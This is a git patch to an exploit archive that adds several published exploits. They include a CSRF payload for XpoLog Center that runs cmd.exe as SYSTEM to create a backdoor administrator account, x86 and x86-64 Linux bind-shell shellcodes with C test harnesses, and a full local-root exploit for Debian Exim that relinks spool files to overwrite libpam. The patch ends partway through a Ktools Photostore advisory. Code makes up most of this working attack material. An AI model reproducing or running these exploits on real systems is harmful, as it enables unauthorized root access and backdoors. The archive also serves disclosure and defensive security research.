From b530dd470e6d942edc294887448f81b2cf3cf523 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 5 Jul 2016 05:06:28 +0000 Subject: [PATCH] DB: 2016-07-05 8 new exploits BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities BigDump 0.29b and 0.32b - Multiple Vulnerabilities Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Debian Exim - Spool Local Root Privilege Escalation Ubuntu 16.04 local root exploit - netfilter target_offset OOB Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit XpoLog Center 6 - Remote Command Execution CSRF Ktools Photostore 4.7.5 - Multiple Vulnerabilities Linux 64bit NetCat Bind Shell Shellcode - 64 bytes WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities Linux x86 TCP Bind Shell Port 4444 - 98 bytes WebCalendar 1.2.7 - Multiple Vulnerabilities eCardMAX 10.5 - Multiple Vulnerabilities --- files.csv | 14 +- platforms/jsp/webapps/40050.txt | 98 +++++++++ platforms/lin_x86-64/shellcode/40052.c | 40 ++++ platforms/lin_x86/shellcode/40056.c | 265 +++++++++++++++++++++++ platforms/linux/local/40054.c | 280 +++++++++++++++++++++++++ platforms/php/webapps/40051.txt | 99 +++++++++ platforms/php/webapps/40055.py | 98 +++++++++ platforms/php/webapps/40057.txt | 269 ++++++++++++++++++++++++ platforms/php/webapps/40058.txt | 98 +++++++++ 9 files changed, 1258 insertions(+), 3 deletions(-) create mode 100755 platforms/jsp/webapps/40050.txt create mode 100755 platforms/lin_x86-64/shellcode/40052.c create mode 100755 platforms/lin_x86/shellcode/40056.c create mode 100755 platforms/linux/local/40054.c create mode 100755 platforms/php/webapps/40051.txt create mode 100755 platforms/php/webapps/40055.py create mode 100755 platforms/php/webapps/40057.txt create mode 100755 platforms/php/webapps/40058.txt diff --git a/files.csv b/files.csv index 38b69cee7..7c4090a46 100755 --- a/files.csv +++ b/files.csv @@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 -38076,platforms/php/webapps/38076.txt,"BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 +38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0 38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0 @@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port 39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0 -39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 +39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0 39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0 39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80 39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80 @@ -36161,6 +36161,7 @@ id,file,description,date,author,platform,type,port 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 +40054,platforms/linux/local/40054.c,"Debian Exim - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 @@ -36220,4 +36221,11 @@ id,file,description,date,author,platform,type,port 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 -40049,platforms/linux/local/40049.c,"Ubuntu 16.04 local root exploit - netfilter target_offset OOB",2016-07-03,vnik,linux,local,0 +40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0 +40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303 +40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 +40052,platforms/lin_x86-64/shellcode/40052.c,"Linux 64bit NetCat Bind Shell Shellcode - 64 bytes",2016-07-04,CripSlick,lin_x86-64,shellcode,0 +40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 +40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0 +40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 +40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 diff --git a/platforms/jsp/webapps/40050.txt b/platforms/jsp/webapps/40050.txt new file mode 100755 index 000000000..35cc14261 --- /dev/null +++ b/platforms/jsp/webapps/40050.txt @@ -0,0 +1,98 @@ + +XpoLog Center V6 CSRF Remote Command Execution + + +Vendor: XpoLog LTD +Product web page: http://www.xpolog.com +Affected version: 6.4469 + 6.4254 + 6.4252 + 6.4250 + 6.4237 + 6.4235 + 5.4018 + +Summary: Applications Log Analysis and Management Platform. + +Desc: XpoLog suffers from arbitrary command execution. Attackers +can exploit this issue using the task tool feature and adding a +command with respected arguments to given binary for execution. +In combination with the CSRF an attacker can execute system commands +with SYSTEM privileges. + +Tested on: Apache-Coyote/1.1 + Microsoft Windows Server 2012 + Microsoft Windows 7 Professional SP1 EN 64bit + Java/1.7.0_45 + Java/1.8.0.91 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5335 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php + + +14.06.2016 + +-- + + +exePath = "C:\\windows\\system32\\cmd.exe" +exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add" + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +-- + +exePath = "C:\\windows\\system32\\cmd.exe" +exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt" + + +GET +http://10.0.0.17:30303/logeye/testingus.txt + +Response: + +nt authority\system diff --git a/platforms/lin_x86-64/shellcode/40052.c b/platforms/lin_x86-64/shellcode/40052.c new file mode 100755 index 000000000..aeed81992 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40052.c @@ -0,0 +1,40 @@ +#include +#include + +// Exploit Title: [NetCat Bind Shell 64bit 64byte] +// Date: [6/28/2016] +// Exploit Author: [CripSlick] +// Tested on: [Kali 2.0] +// Version: [v1.10-41] + +// ShepherdDowling@gmail.com +// OffSec ID: OS-20614 + +// Victim: netstat -an | grep LISTEN | grep tcp +// Attacker: nc + +unsigned char code[] = \ + +#define PORT "\x39\x39" +// Keep to two bytes + +"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05" +; + +int main () +{ + // I make sure there are no nulls + // The string count will terminate at the first \x00 + printf("The Shellcode is %d Bytes Long\n", strlen(code)); + + // Next I throw 0xAAAAAAAA into every register before shellcode execution + // This ensures that the shellcode will run in any circumstance + + __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t" + "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" + "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" + "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" + "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t" + "call code"); + return 0; +} diff --git a/platforms/lin_x86/shellcode/40056.c b/platforms/lin_x86/shellcode/40056.c new file mode 100755 index 000000000..57922794d --- /dev/null +++ b/platforms/lin_x86/shellcode/40056.c @@ -0,0 +1,265 @@ +/* +# Linux x86 TCP Bind Shell Port 4444 (98 bytes) +# Author: sajith +# Tested on: i686 GNU/Linux +# Shellcode Length: 98 +# SLAE - 750 + +------------c prog ---poc by sajith shetty---------- +#include +#include +#include +#include +#include + +int main(void) +{ + +int sock_file_des, clientfd; +struct sockaddr_in sock_ad; +//[1]we need to create the socket connection using socket call function + +//[*]Man page for socket call +//----->int socket(int domain, int type, int protocol); +// domain = AF_INET (IPv4 Internet protocol family which will be used for communication) +// type = SOCK_STREAM (Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported +// protocol = 0 (The protocol specifies a particular protocol to be used with the socket.Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0. + +sock_file_des = socket(AF_INET, SOCK_STREAM, 0); +//[2]Binds the socket to localhost and port (here will use 4444) using bind call. + +//[*]Man page for bind call +//------->int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen); +// sockfd = sock_file_des +// const struct sockaddr *addr = (struct sockaddr *)&sock_ad (bind() assigns the address specified to by addr to the socket referred to by the file descriptor sockfd) +// socklen_t addrlen = sizeof(sock_ad) (addrlen specifies the size, in bytes, of the address structure pointed to by addr.) + +sock_ad.sin_family = AF_INET; // Host byte order.(2) +sock_ad.sin_port = htons(4444);// network byte order +sock_ad.sin_addr.s_addr = INADDR_ANY;//(0)bindshell will listen on any address + +bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad)); + + +//[3]Waits for incoming connection using call to listen + +//[*]Man page for listen call +//------->int listen(int sockfd, int backlog); +// sockfd = sock_file_des (The sockfd argument is a file descriptor that refers to a socket of type SOCK_STREAM) +// backlog = 0 (The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow) + + +listen(sock_file_des, 0); + +//[4]Accept the connection using call to accept + +//[*]Man page to accept call +//------->int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +// sockfd = sock_file_des +// struct sockaddr *addr = NULL (The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer.When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL. +// socklen_t *addrlen = NULL + + +clientfd = accept(sock_file_des, NULL, NULL); + +//[5]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2 + +//[*]Man page for dup2 (duplicate a file descriptor) +//------->int dup2(int oldfd, int newfd); +// oldfd = clientfd +// newfd = 0(stdin) , 1(stdout), 2(stderr) +dup2(clientfd, 0); // stdin +dup2(clientfd, 1); // stdout +dup2(clientfd, 2); // stderr + +//[6]Execute shell (here we use /bin/sh) using execve call + +//[*]Man page for execve call +//------->int execve(const char *filename, char *const argv[],char *const envp[]); +// char *filename = /bin/sh +// char *const argv[] = NULL +// char *const envp[] = NULL + +execve("/bin/sh",NULL,NULL); +} +----------------------end of c program-------------- + +global _start + +section .text + +_start: + +;syscall for socket +;cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket +;#define __NR_socketcall 102 (0x66 in hex) +;sock_file_des = socket(AF_INET, SOCK_STREAM, 0) +;AF_INET = 2 ( bits/socket.h) +;SOCK_STREAM = 1 (bits/socket.h) +;socket(2,1,0) +xor eax, eax ; zero out eax register using XOR operation +xor ebx, ebx ; zero out ebx register using XOR operation +push eax ; move 0 to stack (protocol=0) +mov al, 0x66 ; moves socket call number to al register +mov bl, 0x1 ; moves 0x1 to bl register +push ebx ; value in ebx=1 is pushed in to the stack (sock_stream =1) +push 0x2 ; value 0x2 is pushed onto stack (AF_INET=2) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 ; socket() +mov esi, eax ; store sockfd in esi register + +;sock_ad.sin_addr.s_addr = INADDR_ANY;//0, bindshell will listen on any address +;sock_ad.sin_port = htons(4444);// port to bind.(4444) +;sock_ad.sin_family = AF_INET; // TCP protocol (2). +xor edx, edx ; zero out edx register using XOR operation +push edx ; push 0 on to stack (INADDR_ANY) +push word 0x5C11; htons(4444) +push word 0x2 ; AF_INET = 2 +mov ecx, esp ; save the pointer to args in ecx + +;bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad)); +;cat /usr/include/linux/net.h | grep bind +;bind = 2 + +mov al, 0x66 ; sys socket call +mov bl, 0x2 ; bind =2 +push 0x10 ; size of sock_ad (sizeof(sock_ad)) +push ecx ; struct pointer +push esi ; push sockfd (sock_file_des) onto stack +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + + +;listen(sock_file_des, 0); +;cat /usr/include/linux/net.h | grep listen +; listen =4 + +mov al, 0x66 ; sys socket call +mov bl, 0x4 ; listen=4 +push edx ; push 0 onto stack (backlog=0) +push esi ; sockfd (sock_file_des ) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + +;clientfd = accept(sock_file_des, NULL, NULL) +;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +;cat /usr/include/linux/net.h | grep accept +; accept=5 + +mov al, 0x66 ; sys socket call +mov bl, 0x5 ; accept =5 +push edx ; null value socklen_t *addrlen +push edx ; null value sockaddr *addr +push esi ; sockfd (sock_file_des ) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + +;int dup2(int oldfd, int newfd); +;dup2(clientfd, 0); // stdin +;dup2(clientfd, 1); // stdout +;dup2(clientfd, 2); // stderr + +mov ebx, eax ;move client fd to ebx +xor ecx, ecx ; xor to clear out ecx +mov cl, 3 ; counter to loop 3 times + +loopinghere: + +mov al, 0x3f ; sys call for dup2 +int 0x80 +dec cl ; decrement till 0 +jns loopinghere ; loop as long sign flag is not set + +;Execute shell (here we use /bin/sh) using execve call +;execve("//bin/sh",["//bin/sh"]) + +mov al, 11 ; execve + push edx ; push null + push 0x68732f6e ; hs/b + push 0x69622f2f ; ib// + mov ebx,esp ; save pointer + push edx ; push null + push ebx ; push pointer + mov ecx,esp ; save pointer + int 0x80 +-------------obj dump------------ +finalcode: file format elf32-i386 + + +Disassembly of section .text: + +08048060 <_start>: + 8048060: 31 c0 xor eax,eax + 8048062: 31 db xor ebx,ebx + 8048064: 50 push eax + 8048065: b0 66 mov al,0x66 + 8048067: b3 01 mov bl,0x1 + 8048069: 53 push ebx + 804806a: 6a 02 push 0x2 + 804806c: 89 e1 mov ecx,esp + 804806e: cd 80 int 0x80 + 8048070: 89 c6 mov esi,eax + 8048072: 31 d2 xor edx,edx + 8048074: 52 push edx + 8048075: 66 68 11 5c pushw 0x5c11 + 8048079: 66 6a 02 pushw 0x2 + 804807c: 89 e1 mov ecx,esp + 804807e: b0 66 mov al,0x66 + 8048080: b3 02 mov bl,0x2 + 8048082: 6a 10 push 0x10 + 8048084: 51 push ecx + 8048085: 56 push esi + 8048086: 89 e1 mov ecx,esp + 8048088: cd 80 int 0x80 + 804808a: b0 66 mov al,0x66 + 804808c: b3 04 mov bl,0x4 + 804808e: 52 push edx + 804808f: 56 push esi + 8048090: 89 e1 mov ecx,esp + 8048092: cd 80 int 0x80 + 8048094: b0 66 mov al,0x66 + 8048096: b3 05 mov bl,0x5 + 8048098: 52 push edx + 8048099: 52 push edx + 804809a: 56 push esi + 804809b: 89 e1 mov ecx,esp + 804809d: cd 80 int 0x80 + 804809f: 89 c3 mov ebx,eax + 80480a1: 31 c9 xor ecx,ecx + 80480a3: b1 03 mov cl,0x3 + +080480a5 : + 80480a5: b0 3f mov al,0x3f + 80480a7: cd 80 int 0x80 + 80480a9: fe c9 dec cl + 80480ab: 79 f8 jns 80480a5 + 80480ad: b0 0b mov al,0xb + 80480af: 52 push edx + 80480b0: 68 6e 2f 73 68 push 0x68732f6e + 80480b5: 68 2f 2f 62 69 push 0x69622f2f + 80480ba: 89 e3 mov ebx,esp + 80480bc: 52 push edx + 80480bd: 53 push ebx + 80480be: 89 e1 mov ecx,esp + 80480c0: cd 80 int 0x80 + +----------------------------------------------- +gcc -fno-stack-protector -z execstack shellcode.c -o shellcode +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68" +"\x11\x5c" // port number 4444 +"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file diff --git a/platforms/linux/local/40054.c b/platforms/linux/local/40054.c new file mode 100755 index 000000000..ec9b5622a --- /dev/null +++ b/platforms/linux/local/40054.c @@ -0,0 +1,280 @@ +/* +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA512 + +Hello List, + +This is just a minor issue in Exim, no replies so far, so publication +should be OK. + +Introduction: +============ +Exim4 in some variants is started as root but switches to uid/gid +Debian-exim/Debian-exim. But as Exim might need to store received +messages in user mailboxes, it has to have the ability to regain +privileges. This is also true when Exim is started as "sendmail". +During internal operation, sendmail (Exim) will manipulate message +spool files in directory structures owned by user "Debian-exim" +without caring about symlink attacks. Thus execution of code as +user "Debian-exim" can be used to gain root privileges by invoking +"sendmail" as user "Debian-exim". + + +POC: +=== +http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c +demonstrates the issue using a ELF file being both executable +and shared library which is invoked multiple times by different +processes. + + +Results, Discussion: +=================== +As Exim4 process itself is already quite privileged - it has to +access the user mailboxes with different UIDs anyway - the having +such problems is expectable and explainable. A change in documentation +might make sense, to indicate, that the special user "Debian-exim" +is only intended to mark files being used by the daemon, but not +to provide root/daemon user privilege separation. + +Even without this vulnerability, a "Debian-exim" process could +use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ +to escalate to "adm" group, which again makes it very likely to +use "syslog", "apache" or other components to escalate to root +via "/var/log". This is annoying, perhaps this should get a CVE +to make daemon-to-root escalations harder in general. + + +Timeline: +======== +20160605: Discovery, report Debian security +20160607: Writeup +20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/ +20160630: Publication + + +References: +========== +* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/ +* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ +* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/ +-----BEGIN PGP SIGNATURE----- + +iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj +8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H +=4IJk +-----END PGP SIGNATURE----- + + * This software is provided by the copyright owner "as is" and any + * expressed or implied warranties, including, but not limited to, + * the implied warranties of merchantability and fitness for a particular + * purpose are disclaimed. In no event shall the copyright owner be + * liable for any direct, indirect, incidential, special, exemplary or + * consequential damages, including, but not limited to, procurement + * of substitute goods or services, loss of use, data or profits or + * business interruption, however caused and on any theory of liability, + * whether in contract, strict liability, or tort, including negligence + * or otherwise, arising in any way out of the use of this software, + * even if advised of the possibility of such damage. + * + * Copyright (c) 2016 halfdog + * See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/ + * for more information. + * + * Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry + * Use: Run as "Debian-exim": ./EximUpgrade --Upgrade + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade" +#define UPGRADE_LIB_DIR "/var/spool/exim4" + +#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1" + +extern char **environ; + +#if defined(__x86_64__) +const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; +#define init_args(argc, argv) __asm__ volatile ( \ + "mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \ + :"=m"(argc), "=r"(argv)::"memory") +#endif /* __x86_64__ */ + + +/** Library initialization function, called by the linker. If not + * named _init, parameter has to be set during linking using -init=name + */ +extern void _libInit() { + if(geteuid()!=0) return; + int result=chown(UPGRADE_FILE_NAME, 0, 0); + assert(!result); + result=chmod(UPGRADE_FILE_NAME, 04755); + assert(!result); + exit(0); +} + +extern void _entry (void) { + int argc=0; + char **argv = NULL; + init_args(argc, argv); + int result=main(argc, argv); + exit(result); +} + +extern void pam_start() {} +extern void pam_set_item() {} +extern void pam_chauthtok() {} +extern void pam_end() {} +extern void pam_strerror() {} +extern void pam_getenvlist() {} +extern void pam_open_session() {} +extern void pam_close_session() {} +extern void pam_get_item() {} +extern void pam_acct_mgmt() {} +extern void pam_setcred() {} +extern void pam_authenticate() {} + + +int main(int argc, char **argv) { + DIR *dirStruct; + struct dirent *dirEnt; + char linkPath[1024]; + int result; + + assert(argc>1); + if(!strcmp(argv[1], "--Exec")) { + setresgid(0, 0, 0); + setresuid(0, 0, 0); + execve(argv[2], argv+2, environ); + fprintf(stderr, "Exec failed\n"); + return(1); + } + + if(!strcmp(argv[1], "--Repair")) { + int targetFd=open(TARGET_PATH, O_RDWR); + assert(targetFd>=0); + result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3])); + assert(!result); + chmod(TARGET_PATH, atoi(argv[4])); + return(0); + } + + if(!strcmp(argv[1], "--Upgrade")) { + struct stat origStatData; + stat(TARGET_PATH, &origStatData); + + char *execArgs[6]; + int childPid=fork(); + if(!childPid) { + int inputFd=open("/dev/null", O_RDONLY); + dup2(inputFd, 0); + execArgs[0]="/usr/sbin/sendmail"; + execArgs[1]="root@localhost"; + execArgs[2]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + + strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J"); + dirStruct=opendir("/var/spool/exim4/msglog"); + assert(dirStruct); + result=1; + while(result) { + while((dirEnt=readdir(dirStruct))) { + if(*dirEnt->d_name=='.') continue; +// Be fast, perhaps aligned word copy needed. Pray to 23 in demo. + strncpy(linkPath+23, dirEnt->d_name, 16); + result=symlink(TARGET_PATH, linkPath); + assert(!result); + fprintf(stderr, "Relinked %s\n", linkPath); + break; + } + rewinddir(dirStruct); + } + closedir(dirStruct); + while(1) { + struct stat currentStatData; + stat(TARGET_PATH, ¤tStatData); + if(currentStatData.st_uid!=origStatData.st_uid) break; + sleep(1); + } + waitpid(childPid, NULL, 0); + + fprintf(stderr, "Target ready for writing\n"); + int targetFd=open(TARGET_PATH, O_RDWR); + assert(targetFd>=0); + char *origData=(char*)malloc(origStatData.st_size); + result=read(targetFd, origData, origStatData.st_size); + assert(result==origStatData.st_size); + + struct stat newStatData; + stat(UPGRADE_FILE_NAME, &newStatData); + char *newData=(char*)malloc(newStatData.st_size); + int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY); + result=read(selfFd, newData, newStatData.st_size); + assert(result==newStatData.st_size); + close(selfFd); + + ftruncate(targetFd, 0); + lseek(targetFd, 0, SEEK_SET); + result=write(targetFd, newData, newStatData.st_size); + assert(result==newStatData.st_size); + fsync(targetFd); + + childPid=fork(); + if(!childPid) { + execArgs[0]="/bin/su"; + execArgs[1]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + waitpid(childPid, NULL, 0); + + ftruncate(targetFd, 0); + lseek(targetFd, 0, SEEK_SET); + result=write(targetFd, origData, origStatData.st_size); + close(targetFd); + + childPid=fork(); + if(!childPid) { + char numbers[128]; + char *ptr=numbers; + execArgs[0]=UPGRADE_FILE_NAME; + execArgs[1]="--Repair"; + result=sprintf(ptr, "%d", origStatData.st_uid); + execArgs[2]=ptr; ptr+=result+1; + result=sprintf(ptr, "%d", origStatData.st_gid); + execArgs[3]=ptr; ptr+=result+1; + result=sprintf(ptr, "%d", origStatData.st_mode); + execArgs[4]=ptr; + execArgs[5]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + waitpid(childPid, NULL, 0); + + execArgs[0]=UPGRADE_FILE_NAME; + execArgs[1]="--Exec"; + execArgs[2]="/bin/bash"; + execArgs[3]="-c"; + execArgs[4]="id; exec $0"; + execArgs[5]=NULL; + execve(execArgs[0], execArgs, environ); + return(1); + } + fprintf(stderr, "Usage: %s --Upgrade or --Exec [args]\n", argv[0]); + return(1); +} diff --git a/platforms/php/webapps/40051.txt b/platforms/php/webapps/40051.txt new file mode 100755 index 000000000..5d19192b9 --- /dev/null +++ b/platforms/php/webapps/40051.txt @@ -0,0 +1,99 @@ +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# Ktools Photostore <= 4.7.5 Multiple Vulnerabilities +# Bug discovered by Yakir Wizman +# Date 01/07/2016 +# Affected versions prior to 4.7.5 +# Vendor Homepage - http://www.ktools.net + +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# Author will be not responsible for any damage. +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# About the Application: +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# PhotoStore is a professional photo gallery & shopping cart software which contain the following basic features as described bellow: +# +# Sell various sizes or formats of the same photo. +# Sell photos, vector art, zip files and more. +# Sell videos PhotoStore Pro Only +# Sell prints, artwork, products, packages, digital collections and more. +# Built in shopping cart and ecommerce system to accept credit cards and/or check payments. +# Email notifications to both you and the customer upon purchase. +# Customers can instantly download after payment. +# Customers can instantly download their files after payment. +# Connects to PayPal and 2Checkout. +# Built in credit system to allow your customers to buy credits. +# Allow your members to upload and sell their photos and other media while you take a commission. + +# The vulnerabilities which are described bellow does not require any legitimate user to exploit them. +# The Photostore application is prone to a multiple vulnerabilities such as SQL Injection & Cross Site Scripting and does not require any legitimate user or admin privilege to exploit them. +# A potentially attacker can exploit those 